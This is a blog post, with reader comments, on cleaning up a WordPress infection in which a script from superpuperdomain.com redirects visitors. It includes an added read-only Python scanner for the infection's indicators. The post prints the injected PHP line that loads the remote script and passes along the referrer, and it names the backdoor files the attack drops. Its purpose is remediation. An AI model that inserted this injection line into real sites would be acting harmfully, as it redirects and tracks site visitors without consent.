PhpRemoteView hack: Superpuperdomain.com - How to Remove It

A few days ago a new PhpRemoteView hack, a malicious JavaScript loading from superpuperdomain.com/count.php, attacked many WordPress websites, including some of mine. There are already a few discussions on this topic and it was pretty difficult to find a reliable source on how to get rid of this problem, but a few websites like tbogard.com and techspheria.com introduce interesting solutions, which I combined together and first tested on my sites before writing this article (it worked on my WP blogs btw :)

Generally, the JavaScript
'<script language="javascript" src="http://superpuperdomain.com/count.php?ref...></script>';
redirects visitors who were going to the WordPress site to fake search engines full of ads. To check whether you have it (apart from the obvious redirection :), look for a similar chunk of code on your homepage (it should appear right at the end of the HTML code, behind the closing body tag):

'<script language="javascript" SRC="http://superpuperdomain.com/count.php?ref=http%3A%2F%2Fsite.com%2Fdif%2F"></script>';

It is caused by a security vulnerability in timthumb.php (also known as thumb.php), which is a free PHP script that resizes images and is used by many WP theme developers. Many great WP themes use that script, including Elegant Themes, so if you haven’t updated your theme during the last 5 days, your website is probably infected by it! Here is a step by step solution…

How to get rid of this superpuperdomain.com’s JavaScript Malware:

  • Go to your index.php and delete the following code:

echo '<script type="text/javascript" language="javascript" src="http://superpuperdomain.com/count.php?ref='.urlencode($_SERVER['HTTP_REFERER']) .'"></script>';

Remember to leave ?> at the end of the code!

  • Search for the following files on your server and delete them:

/wp-admin/js/config.php
/wp-admin/common.php
/wp-admin/udp.php
/wp-content/udp.php

Those files are added by hackers and are a part of the phpRemoteView hack, but just in case back up those files (do not open them!!!).

  • Update the Timthumb.php

As the creator of this plugin was informed about this issue a few days ago, the latest corrected version has already been created and is available to download here: http://code.google.com/p/timthumb/ so please upload it to your server to replace the old version of timthumb.php with the new file.

  • Make sure that your file permissions are correctly set.

According to WP – Security Scan (which I personally use on a few sites), I set the following permissions:
[Image: WordPress Custom Sidebar Screenshot]
but I also recommend this WordPress article on that

  • At the end, you can also block the http://superpuperdomain.com’s IP addresses in your .htaccess file and add some additional rules to the .htaccess file itself.
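
A read-only way to check a site for the indicators listed in the steps above, as an added example that is not part of the original article: `audit_site` and `build_sample_site` are hypothetical names, and the sample tree is constructed for the demonstration.

```python
import os
import re
import tempfile

# Indicators taken from the article; the scan is read-only and deletes nothing.
INJECTED = re.compile(rb"superpuperdomain\.com/count\.php", re.IGNORECASE)
DROPPED_FILES = ("wp-admin/js/config.php", "wp-admin/common.php",
                 "wp-admin/udp.php", "wp-content/udp.php")
TIMTHUMB_NAMES = {"timthumb.php", "thumb.php"}
TEXT_SUFFIXES = (".php", ".html", ".htm", ".js", ".htaccess")

def audit_site(root):
    """Return which of the article's indicators are present under `root`."""
    report = {"dropped": [], "injected": [], "timthumb": []}
    for rel in DROPPED_FILES:
        if os.path.isfile(os.path.join(root, rel)):
            report["dropped"].append(rel)
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                continue  # do not follow links out of the web root
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if name.lower() in TIMTHUMB_NAMES:
                report["timthumb"].append(rel)  # copies to replace with the fixed release
            if name.lower().endswith(TEXT_SUFFIXES):
                with open(path, "rb") as fh:
                    for lineno, line in enumerate(fh, 1):
                        if INJECTED.search(line):
                            report["injected"].append((rel, lineno))
    return {kind: sorted(found) for kind, found in report.items()}

def build_sample_site(root):
    """Constructed sample tree: harmless placeholder files, not real malware."""
    files = {
        "index.php": "<?php\necho '<script src=\"http://superpuperdomain.com/count.php"
                     "?ref='.urlencode($_SERVER['HTTP_REFERER']).'\"></script>';\n?>\n",
        "wp-admin/udp.php": "<?php /* placeholder for a dropped file */ ?>\n",
        "wp-content/themes/demo/timthumb.php": "<?php /* placeholder */ ?>\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_site(tmp)
        print(audit_site(tmp))
```

Point `audit_site` at a copy or backup of the web root; every theme listed under `timthumb` needs the updated script, and each `(file, line)` pair under `injected` marks a line to clean by hand.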

I hope that all of that helps you, but let me know if you come across any more problems with that Malware.

Mags Sikora

I'm Mags, an SEO Consultant, London

  • http://fredrik.forséll.se Fredrik

    Thanks, helpful!

  • http://fredrik.forséll.se Fredrik

    Thanks, that was helpful

  • Anonymous

    I have just had this problem and I am using timthumb in my elegant theme. Will get on this right away. Saviour!

  • http://twitter.com/DynamiteTom Tom

    Three of my websites hosted on three different servers have been affected and I am in the middle of cleaning it now – the infection also changes the .htaccess file and redirects to some dodgy .ru domains…

  • Miriam

    Hello, after fixing all the points mentioned above, the superduper-attack disappeared. However, since then the whole comment system of WordPress in my blog broke down. Do you have any idea about a correlation between this hack and the WP-comments? Thanks a lot and lovely greetings, Miriam

  • Louie Villalobos

    Dude. Thank you for this.

  • Louie Villalobos

    I don’t know who you are, but I love you for helping me fix my site.